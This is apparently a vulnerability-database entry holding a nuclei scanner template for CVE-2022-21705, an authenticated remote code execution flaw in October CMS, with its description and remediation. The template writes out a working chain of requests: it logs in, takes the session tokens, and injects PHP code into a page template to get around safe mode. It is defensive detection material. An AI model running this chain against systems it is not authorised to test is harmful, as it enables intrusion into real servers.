Lucene search
K

October CMS - Remote Code Execution

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 49 Views

October CMS - Remote Code Execution, Build 474 patc

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-21705
23 Feb 202222:13
circl
CNNVD
Octobercms 安全漏洞
23 Feb 202200:00
cnnvd
CVE
CVE-2022-21705
23 Feb 202219:00
cve
Cvelist
CVE-2022-21705 Authenticated remote code execution in octobercms
23 Feb 202219:00
cvelist
Github Security Blog
Authenticated remote code execution in October CMS
23 Feb 202221:08
github
NVD
CVE-2022-21705
23 Feb 202219:15
nvd
OSV
CVE-2022-21705 Authenticated remote code execution in octobercms
23 Feb 202219:00
osv
OSV
GHSA-79JW-2F46-WV22 Authenticated remote code execution in October CMS
23 Feb 202221:08
osv
Prion
Design/Logic Flaw
23 Feb 202219:15
prion
Positive Technologies
PT-2022-15052 · Unknown · October Cms
23 Feb 202200:00
ptsecurity
Rows per page
id: CVE-2022-21705

info:
  name: October CMS - Remote Code Execution
  author: iPhantasmic
  severity: high
  description: |
    October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    The issue has been patched in Build 474 (1.0.474) and 1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe manually to installation.
  reference:
    - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe
    - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22
    - https://cyllective.com/blog/post/octobercms-cve-2022-21705/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-21705
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2022-21705
    cwe-id: CWE-74,NVD-CWE-Other
    epss-score: 0.08682
    epss-percentile: 0.94478
    cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:*
  metadata:
    max-request: 5
    vendor: octobercms
    product: october
  tags: cve2022,cve,authenticated,rce,cms,octobercms,injection,vuln

http:
  - raw:
      - | # to obtain session_key and token
        GET /backend/backend/auth/signin HTTP/1.1
        Host: {{Hostname}}
      - | # to perform authentication and obtain admin cookies
        POST /backend/backend/auth/signin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}
      - | # to inject php code in Markup editor and perform exploit
        POST /backend/cms HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-OCTOBER-REQUEST-HANDLER: onSave
        X-OCTOBER-REQUEST-PARTIALS:
        X-Requested-With: XMLHttpRequest

        _session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0
      - | # to obtain theme
        POST /backend/cms HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-OCTOBER-REQUEST-HANDLER: onCreateTemplate
        X-OCTOBER-REQUEST-PARTIALS:
        X-Requested-With: XMLHttpRequest

        _session_key={{session_key}}&_token={{token}}&search=&type=page
      - | # to access the template page for generated exploit
        POST /backend/cms HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-OCTOBER-REQUEST-HANDLER: onOpenTemplate
        X-OCTOBER-REQUEST-PARTIALS:
        X-Requested-With: XMLHttpRequest

        _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'function onInit()'
          - 'phpinfo()'
          - 'Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`.'
        condition: and

      # if exploit executes, phpinfo() should now be exposed at the /{{randstr}} endpoint, even though Safe mode is enabled

      - type: status
        status:
          - 200

    extractors:
      - type: xpath
        name: session_key
        internal: true
        xpath:
          - "/html/body/div[1]/div/div[2]/div/div/form/input[1]"
        attribute: value

      # Obtain _session_key for current OctoberCMS session

      - type: xpath
        name: token
        internal: true
        xpath:
          - "/html/body/div[1]/div/div[2]/div/div/form/input[2]"
        attribute: value

      # Obtain _token for current OctoberCMS session

      - type: regex
        name: theme
        group: 1
        regex:
          - '<input\stype=\\"hidden\\"\svalue=\\"demo\\"\sname=\\"([^"]*)\\"'
        internal: true
        part: body

# Obtain current theme used for Markup editor of OctoberCMS
# digest: 490a0046304402202a0c5946d2f86f768adefa7d4992abd581681d6328bf38f760859a7887824e040220357f8d58fbe74f6d5ac3633a63b69c0046f053561039bfaea415ec69f70eb7ce:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.17.2
CVSS 28.5
EPSS0.08682
SSVC
49